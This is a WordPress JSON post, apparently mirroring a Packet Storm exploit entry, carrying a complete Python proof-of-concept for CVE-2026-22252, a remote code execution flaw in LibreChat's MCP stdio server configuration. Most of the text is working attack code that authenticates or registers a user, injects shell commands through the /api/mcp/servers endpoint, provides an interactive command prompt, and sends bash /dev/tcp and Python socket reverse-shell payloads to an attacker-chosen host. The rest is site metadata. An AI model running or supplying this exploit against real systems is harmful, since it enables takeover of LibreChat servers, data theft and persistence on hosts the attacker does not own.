{"id":38145,"date":"2026-01-29T10:37:41","date_gmt":"2026-01-29T10:37:41","guid":{"rendered":"http:\/\/localhost\/?p=38145"},"modified":"2026-01-29T10:37:41","modified_gmt":"2026-01-29T10:37:41","slug":"librechat-mcp-082-rc2-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=38145","title":{"rendered":"\ud83d\udcc4 LibreChat MCP 0.8.2-rc2 Remote Code Execution_PACKETSTORM:214576"},"content":{"rendered":"

{“lastseen”:”2026-01-29T16:29:53″,”description”:”Proof of concept exploit for a remote code execution vulnerability in LibreChat MCP version 0.8.2-rc2 that leverages an unsanitized stdio server configuration issue…”,”published”:”2026-01-29T00:00:00″,”modified”:”2026-01-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 LibreChat MCP 0.8.2-rc2 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:214576″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-22252″],”sourceData”:”=============================================================================================================================================\\n | # Title : LibreChat MCP 0.8.2-rc2 Remote Code Execution via Unsanitized stdio Server Configuration |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.librechat.ai\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/213714\/ \\u0026 \\tCVE-2026-22252\\n \\n [+] Summary : A critical Remote Code Execution (RCE) vulnerability was identified in LibreChat\u2019s Model Context Protocol (MCP) server management functionality. \\n The issue stems from insufficient validation and restriction of user-supplied MCP server configurations, specifically when using the stdio transport type.\\n An authenticated attacker can abuse the \/api\/mcp\/servers endpoint to define a malicious MCP server configuration that executes \\n \\t\\t\\t\\t arbitrary system commands on the host running LibreChat. Because the application directly spawns operating system processes based on user-controlled parameters without \\n \\t\\t\\t\\t proper sandboxing or allowlisting, this flaw enables full command execution with the privileges of the LibreChat service.\\n Successful exploitation may lead to complete system compromise, including unauthorized access, data exfiltration, persistence, \\n \\t\\t\\t\\t and lateral movement within the hosting environment. The vulnerability represents a design-level security flaw rather than a simple input validation issue and poses a severe risk in production deployments\\n [+] POC :\\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import json\\n import sys\\n import re\\n import time\\n import argparse\\n import signal\\n import logging\\n from typing import Optional, Dict, Any, Tuple, List\\n from dataclasses import dataclass\\n from enum import Enum\\n from urllib.parse import urljoin\\n \\n logging.basicConfig(\\n level=logging.INFO,\\n format=’%(asctime)s – %(levelname)s – %(message)s’\\n )\\n logger = logging.getLogger(__name__)\\n \\n class TransportType(Enum):\\n \\n STDIO = \\”stdio\\”\\n SSE = \\”sse\\”\\n HTTP = \\”http\\”\\n \\n @dataclass\\n class AuthResult:\\n \\n success: bool\\n token: Optional[str] = None\\n cookies: Optional[Dict] = None\\n session_id: Optional[str] = None\\n csrf_token: Optional[str] = None\\n message: str = \\”\\”\\n \\n class LibreChatExploit:\\n def __init__(self, target_url: str, timeout: int = 30):\\n self.target_url = target_url.rstrip(‘\/’)\\n self.timeout = timeout\\n \\n self.session = requests.Session()\\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36’,\\n ‘Accept’: ‘application\/json, text\/plain, *\/*’,\\n ‘Accept-Language’: ‘en-US,en;q=0.5’,\\n ‘Connection’: ‘keep-alive’,\\n })\\n \\n self.auth_result = AuthResult(success=False)\\n self.csrf_token = None\\n \\n def _extract_csrf_token(self, response_text: str) -\\u003e Optional[str]:\\n \\n patterns = [\\n r’name=\\”csrfToken\\” value=\\”([^\\”]+)\\”‘,\\n r’\\”csrfToken\\”:\\”([^\\”]+)\\”‘,\\n r’window\\\\.csrfToken = \\”([^\\”]+)\\”‘,\\n r’\\u003cmeta name=\\”csrf-token\\” content=\\”([^\\”]+)\\”‘,\\n ]\\n \\n for pattern in patterns:\\n match = re.search(pattern, response_text)\\n if match:\\n return match.group(1)\\n \\n if ‘csrf_token’ in self.session.cookies:\\n return self.session.cookies.get(‘csrf_token’)\\n \\n return None\\n \\n def _get_base_endpoints(self) -\\u003e Dict[str, str]:\\n \\n try:\\n \\n health_check = self.session.get(\\n f\\”{self.target_url}\/health\\”,\\n timeout=self.timeout\\n )\\n \\n for endpoint in [‘\/api’, ‘\/api\/v1’, ‘\/api\/v2’]:\\n try:\\n response = self.session.get(\\n f\\”{self.target_url}{endpoint}\\”,\\n timeout=self.timeout,\\n allow_redirects=False\\n )\\n if response.status_code \\u003c 400:\\n logger.info(f\\”Found API interface at: {endpoint}\\”)\\n break\\n except:\\n continue\\n \\n except Exception as e:\\n logger.debug(f\\”System check failed: {e}\\”)\\n \\n return {\\n ‘register’: ‘\/api\/auth\/register’,\\n ‘login’: ‘\/api\/auth\/login’,\\n ‘mcp_servers’: ‘\/api\/mcp\/servers’,\\n ‘user_info’: ‘\/api\/auth\/me’,\\n }\\n \\n def check_target(self) -\\u003e Tuple[bool, str, Optional[str]]:\\n \\n try:\\n response = self.session.get(\\n self.target_url,\\n timeout=self.timeout\\n )\\n \\n if response.status_code != 200:\\n return False, \\”Server unavailable\\”, None\\n \\n html_content = response.text\\n indicators = [‘LibreChat’, ‘librechat’, ‘Evo’, ‘Next.js’, ‘authToken’]\\n \\n is_librechat = any(indicator in html_content for indicator in indicators)\\n \\n if not is_librechat:\\n return False, \\”This may not be a LibreChat server\\”, None\\n \\n version_patterns = [\\n r’\\”version\\”:\\”([^\\”]+)\\”‘,\\n r’librechat-([\\\\d\\\\.]+)’,\\n r’v(\\\\d+\\\\.\\\\d+\\\\.\\\\d+)’,\\n ]\\n \\n version = None\\n for pattern in version_patterns:\\n match = re.search(pattern, html_content)\\n if match:\\n version = match.group(1)\\n break\\n \\n self.csrf_token = self._extract_csrf_token(html_content)\\n if self.csrf_token:\\n self.session.headers.update({‘X-CSRF-Token’: self.csrf_token})\\n \\n return True, \\”LibreChat confirmed\\”, version\\n \\n except requests.RequestException as e:\\n return False, f\\”Connection error: {e}\\”, None\\n \\n def register_user(self, username: str, password: str, email: str) -\\u003e bool:\\n \\n endpoints = self._get_base_endpoints()\\n url = urljoin(self.target_url, endpoints[‘register’])\\n \\n headers = {\\”Content-Type\\”: \\”application\/json\\”}\\n if self.csrf_token:\\n headers[‘X-CSRF-Token’] = self.csrf_token\\n \\n payload = {\\n \\”name\\”: username[:50],\\n \\”email\\”: email[:100],\\n \\”password\\”: password,\\n \\”confirm_password\\”: password,\\n \\”username\\”: username[:30]\\n }\\n \\n try:\\n response = self.session.post(\\n url, json=payload, headers=headers, timeout=self.timeout\\n )\\n \\n logger.debug(f\\”Registration response: {response.status_code}\\”)\\n \\n if response.status_code in [200, 201, 302]:\\n logger.info(f\\”[\u2713] User registered: {username}\\”)\\n \\n if ‘csrf’ in response.text.lower():\\n self.csrf_token = self._extract_csrf_token(response.text)\\n if self.csrf_token:\\n self.session.headers.update({‘X-CSRF-Token’: self.csrf_token})\\n return True\\n else:\\n logger.warning(f\\”Registration failed (HTTP {response.status_code}): {response.text[:200]}\\”)\\n return False\\n \\n except Exception as e:\\n logger.error(f\\”Error during registration: {e}\\”)\\n return False\\n \\n def login(self, email: str, password: str) -\\u003e AuthResult:\\n \\n endpoints = self._get_base_endpoints()\\n url = urljoin(self.target_url, endpoints[‘login’])\\n \\n headers = {\\”Content-Type\\”: \\”application\/json\\”}\\n if self.csrf_token:\\n headers[‘X-CSRF-Token’] = self.csrf_token\\n \\n payload = {\\”email\\”: email, \\”password\\”: password}\\n \\n try:\\n response = self.session.post(\\n url, json=payload, headers=headers, timeout=self.timeout, allow_redirects=True\\n )\\n \\n logger.debug(f\\”Login response: {response.status_code}\\”)\\n \\n if response.status_code in [200, 201, 302]:\\n \\n token = None\\n try:\\n data = response.json()\\n token = data.get(‘token’) or data.get(‘accessToken’) or data.get(‘authToken’)\\n except:\\n pass\\n \\n cookies = dict(self.session.cookies) if self.session.cookies else {}\\n \\n new_csrf = self._extract_csrf_token(response.text)\\n if new_csrf:\\n self.csrf_token = new_csrf\\n self.session.headers.update({‘X-CSRF-Token’: self.csrf_token})\\n \\n auth_valid = self._verify_authentication()\\n \\n self.auth_result = AuthResult(\\n success=auth_valid,\\n token=token,\\n cookies=cookies,\\n csrf_token=self.csrf_token,\\n message=\\”Login successful\\” if auth_valid else \\”Authentication invalid\\”\\n )\\n \\n if auth_valid:\\n logger.info(\\”[\u2713] Login and authentication successful\\”)\\n else:\\n logger.warning(\\”[!] Login succeeded but session is invalid\\”)\\n \\n return self.auth_result\\n else:\\n error_msg = f\\”Login failed: {response.status_code}\\”\\n if response.text:\\n error_msg += f\\” – {response.text[:100]}\\”\\n logger.error(error_msg)\\n return AuthResult(success=False, message=error_msg)\\n \\n except Exception as e:\\n error_msg = f\\”Login error: {e}\\”\\n logger.error(error_msg)\\n return AuthResult(success=False, message=error_msg)\\n \\n def _verify_authentication(self) -\\u003e bool:\\n \\n endpoints = self._get_base_endpoints()\\n url = urljoin(self.target_url, endpoints[‘user_info’])\\n try:\\n response = self.session.get(url, timeout=self.timeout)\\n if response.status_code == 200:\\n user_data = response.json()\\n return bool(user_data.get(‘username’) or user_data.get(’email’))\\n except:\\n pass\\n return False\\n \\n def check_mcp_endpoint(self) -\\u003e Tuple[bool, str]:\\n \\n endpoints = self._get_base_endpoints()\\n url = urljoin(self.target_url, endpoints[‘mcp_servers’])\\n try:\\n response = self.session.get(url, timeout=self.timeout)\\n if response.status_code == 401:\\n return False, \\”Authentication required\\”\\n elif response.status_code == 403:\\n return False, \\”Forbidden – Might require Admin privileges\\”\\n elif response.status_code == 404:\\n return False, \\”Not Found – Version mismatch\\”\\n elif response.status_code == 200:\\n return True, \\”Available\\”\\n else:\\n return False, f\\”Unknown status: {response.status_code}\\”\\n except Exception as e:\\n return False, f\\”Connection error: {e}\\”\\n \\n def execute_command(self, command: str, shell_path: str = None) -\\u003e Tuple[bool, str]:\\n \\n if not self.auth_result.success:\\n return False, \\”Unauthorized\\”\\n \\n endpoints = self._get_base_endpoints()\\n url = urljoin(self.target_url, endpoints[‘mcp_servers’])\\n \\n shell_path = shell_path or ‘\/bin\/sh’\\n \\n safe_command = f\\”({command}) 2\\u003e\\u00261\\”\\n \\n payload = {\\n \\”config\\”: {\\n \\”type\\”: \\”stdio\\”,\\n \\”title\\”: f\\”server_{int(time.time())}\\”,\\n \\”command\\”: shell_path,\\n \\”args\\”: [\\”-c\\”, safe_command]\\n }\\n }\\n \\n headers = {\\”Content-Type\\”: \\”application\/json\\”}\\n if self.auth_result.token:\\n headers[‘Authorization’] = f\\”Bearer {self.auth_result.token}\\”\\n if self.csrf_token:\\n headers[‘X-CSRF-Token’] = self.csrf_token\\n \\n try:\\n logger.info(f\\”Sending command to: {url}\\”)\\n response = self.session.post(\\n url, json=payload, headers=headers, timeout=self.timeout\\n )\\n \\n if response.status_code in [200, 201]:\\n try:\\n data = response.json()\\n error = data.get(‘error’) or data.get(‘message’, ”)\\n if error and ‘fail’ in error.lower():\\n return False, f\\”Server rejected: {error}\\”\\n except:\\n pass\\n return True, \\”Command sent\\”\\n else:\\n return False, f\\”Execution failed: {response.status_code} – {response.text[:200]}\\”\\n \\n except requests.Timeout:\\n return False, \\”Timeout – Command might be running\\”\\n except Exception as e:\\n return False, f\\”Error: {e}\\”\\n \\n def test_vulnerability(self) -\\u003e Tuple[bool, str, Optional[str]]:\\n \\n test_file = f\\”\/tmp\/librechat_test_{int(time.time())}.txt\\”\\n test_command = f\\”id \\u0026\\u0026 whoami \\u0026\\u0026 hostname \\u0026\\u0026 echo ‘test’ \\u0026\\u0026 date \\u003e {test_file} 2\\u003e\\u00261\\”\\n \\n success, message = self.execute_command(test_command)\\n \\n if success:\\n \\n return True, \\”Vulnerability likely exists (Command sent)\\”, None\\n else:\\n return False, f\\”Vulnerability not found: {message}\\”, None\\n \\n class InteractiveShell:\\n \\n def __init__(self, exploit: LibreChatExploit):\\n self.exploit = exploit\\n self.running = True\\n signal.signal(signal.SIGINT, self.signal_handler)\\n signal.signal(signal.SIGTERM, self.signal_handler)\\n \\n def signal_handler(self, signum, frame):\\n logger.info(\\”\\\\n[!] Shutdown signal received…\\”)\\n self.running = False\\n \\n def run(self):\\n \\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”Interactive Mode – Type ‘help’ for menu\\”)\\n print(\\”Type ‘exit’ to quit\\”)\\n print(\\”=\\”*60)\\n \\n command_history = []\\n rate_limit = 1\\n last_command_time = 0\\n \\n while self.running:\\n try:\\n current_time = time.time()\\n if current_time – last_command_time \\u003c rate_limit:\\n time.sleep(rate_limit – (current_time – last_command_time))\\n \\n try:\\n cmd = input(\\”\\\\nexploit\\u003e \\”).strip()\\n except EOFError:\\n break\\n except KeyboardInterrupt:\\n continue\\n \\n if not cmd: continue\\n \\n last_command_time = time.time()\\n command_history.append(cmd)\\n \\n if cmd.lower() == ‘exit’: break\\n elif cmd.lower() == ‘help’: self.show_help()\\n elif cmd.lower() == ‘history’:\\n for i, h in enumerate(command_history[-10:], 1): print(f\\”{i}: {h}\\”)\\n elif cmd.lower() == ‘status’:\\n print(f\\”Auth: {‘Success’ if self.exploit.auth_result.success else ‘Failed’}\\”)\\n print(f\\”CSRF: {‘Present’ if self.exploit.csrf_token else ‘Missing’}\\”)\\n elif cmd.lower().startswith(‘shell’):\\n self.handle_reverse_shell(cmd)\\n else:\\n success, message = self.exploit.execute_command(cmd)\\n print(f\\”[{‘\u2713’ if success else ‘\u2717’}] {message}\\”)\\n except Exception as e:\\n logger.error(f\\”Shell error: {e}\\”)\\n time.sleep(1)\\n \\n def show_help(self):\\n print(\\”\\”\\”\\n Commands:\\n exit – Exit\\n help – Show this menu\\n history – Show last 10 commands\\n status – Auth status\\n shell [LHOST] [LPORT] – Spawn reverse shell\\n \\n Examples: id, pwd, ls -la, cat \/etc\/passwd\\n \\”\\”\\”)\\n \\n def handle_reverse_shell(self, cmd: str):\\n parts = cmd.split()\\n if len(parts) \\u003c 3:\\n print(\\”[!] Usage: shell [LHOST] [LPORT]\\”)\\n return\\n \\n lhost, lport = parts[1], parts[2]\\n print(f\\”[*] Preparing reverse shell to {lhost}:{lport}\\”)\\n \\n shells = [\\n f\\”bash -c ‘bash -i \\u003e\\u0026 \/dev\/tcp\/{lhost}\/{lport} 0\\u003e\\u00261’\\”,\\n f\\”python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\\\\”{lhost}\\\\\\”,{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\\\\”\/bin\/sh\\\\\\”,\\\\\\”-i\\\\\\”]);’\\”,\\n ]\\n \\n for i, s_cmd in enumerate(shells, 1):\\n print(f\\”[*] Attempting shell #{i}…\\”)\\n success, message = self.exploit.execute_command(s_cmd)\\n if success:\\n print(\\”[\u2713] Shell sent. Check your listener.\\”)\\n break\\n \\n def main():\\n parser = argparse.ArgumentParser(description=’LibreChat MCP RCE Exploit’)\\n parser.add_argument(‘-u’, ‘–url’, required=True, help=’Target URL’)\\n parser.add_argument(‘-c’, ‘–command’, help=’Command to execute’)\\n parser.add_argument(‘–test’, action=’store_true’, help=’Test vulnerability’)\\n parser.add_argument(‘–interactive’, action=’store_true’, help=’Interactive mode’)\\n parser.add_argument(‘–username’, default=’test_user’)\\n parser.add_argument(‘–password’, default=’Test12345!’)\\n parser.add_argument(‘–email’, default=’test@example.local’)\\n parser.add_argument(‘–timeout’, type=int, default=30)\\n parser.add_argument(‘–verbose’, ‘-v’, action=’store_true’)\\n \\n args = parser.parse_args()\\n if args.verbose: logging.getLogger().setLevel(logging.DEBUG)\\n \\n print(\\”=\\”*60)\\n print(\\”LibreChat MCP RCE Exploit – Enhanced\\”)\\n print(\\”CVE-2026-22252\\”)\\n print(\\”=\\”*60)\\n \\n exploit = LibreChatExploit(args.url, args.timeout)\\n \\n print(\\”[*] Checking target system…\\”)\\n ok, msg, ver = exploit.check_target()\\n if not ok:\\n print(f\\”[\u2717] {msg}\\”)\\n sys.exit(1)\\n \\n print(f\\”[\u2713] {msg} (Version: {ver or ‘Unknown’})\\”)\\n \\n print(f\\”\\\\n[*] Authenticating as {args.username}…\\”)\\n auth = exploit.login(args.email, args.password)\\n \\n if not auth.success:\\n print(\\”[*] Attempting registration…\\”)\\n if exploit.register_user(args.username, args.password, args.email):\\n auth = exploit.login(args.email, args.password)\\n \\n if not auth.success:\\n print(f\\”[\u2717] Authentication failed: {auth.message}\\”)\\n sys.exit(1)\\n \\n print(\\”[\u2713] Authentication successful\\”)\\n \\n if args.test:\\n vuln, msg, out = exploit.test_vulnerability()\\n print(f\\”\\\\n[{‘\u2713’ if vuln else ‘\u2717’}] {msg}\\”)\\n elif args.command:\\n success, msg = exploit.execute_command(args.command)\\n print(f\\”[{‘\u2713’ if success else ‘\u2717’}] {msg}\\”)\\n elif args.interactive:\\n shell = InteractiveShell(exploit)\\n shell.run()\\n \\n if __name__ == \\”__main__\\”:\\n try:\\n main()\\n except KeyboardInterrupt:\\n print(\\”\\\\n[*] Interrupted by user\\”)\\n sys.exit(0)\\n \\t\\n Greetings to :============================================================\\n jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n ==========================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214576″,”cvss”:{“score”:9.9,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214576\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-01-29T16:29:53″,”description”:”Proof of concept exploit for a remote code execution vulnerability in LibreChat MCP version 0.8.2-rc2 that leverages an unsanitized stdio server configuration issue…”,”published”:”2026-01-29T00:00:00″,”modified”:”2026-01-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 LibreChat MCP…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,45,12,13,53,7,11,5],"class_list":["post-38145","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-99","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 LibreChat MCP 0.8.2-rc2 Remote Code Execution_PACKETSTORM:214576 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=38145\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 LibreChat MCP 0.8.2-rc2 Remote Code Execution_PACKETSTORM:214576 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-01-29T16:29:53″,”description”:”Proof of concept exploit for a remote code execution vulnerability in LibreChat MCP version 0.8.2-rc2 that leverages an unsanitized stdio server configuration issue…”,”published”:”2026-01-29T00:00:00″,”modified”:”2026-01-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 LibreChat MCP...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=38145\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-29T10:37:41+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"14 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38145#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38145\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 LibreChat MCP 0.8.2-rc2 Remote Code Execution_PACKETSTORM:214576\",\"datePublished\":\"2026-01-29T10:37:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38145\"},\"wordCount\":2682,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.9\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38145#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38145\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38145\",\"name\":\"\ud83d\udcc4 LibreChat MCP 0.8.2-rc2 Remote Code Execution_PACKETSTORM:214576 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-29T10:37:41+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38145#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38145\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38145#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 LibreChat MCP 0.8.2-rc2 Remote Code Execution_PACKETSTORM:214576\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 LibreChat MCP 0.8.2-rc2 Remote Code Execution_PACKETSTORM:214576 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=38145","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 LibreChat MCP 0.8.2-rc2 Remote Code Execution_PACKETSTORM:214576 - zero redgem","og_description":"{“lastseen”:”2026-01-29T16:29:53″,”description”:”Proof of concept exploit for a remote code execution vulnerability in LibreChat MCP version 0.8.2-rc2 that leverages an unsanitized stdio server configuration issue…”,”published”:”2026-01-29T00:00:00″,”modified”:”2026-01-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 LibreChat MCP...","og_url":"https:\/\/zero.redgem.net\/?p=38145","og_site_name":"zero redgem","article_published_time":"2026-01-29T10:37:41+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"14 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=38145#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=38145"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 LibreChat MCP 0.8.2-rc2 Remote Code Execution_PACKETSTORM:214576","datePublished":"2026-01-29T10:37:41+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=38145"},"wordCount":2682,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.9","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=38145#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=38145","url":"https:\/\/zero.redgem.net\/?p=38145","name":"\ud83d\udcc4 LibreChat MCP 0.8.2-rc2 Remote Code Execution_PACKETSTORM:214576 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-29T10:37:41+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=38145#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=38145"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=38145#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 LibreChat MCP 0.8.2-rc2 Remote Code Execution_PACKETSTORM:214576"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero 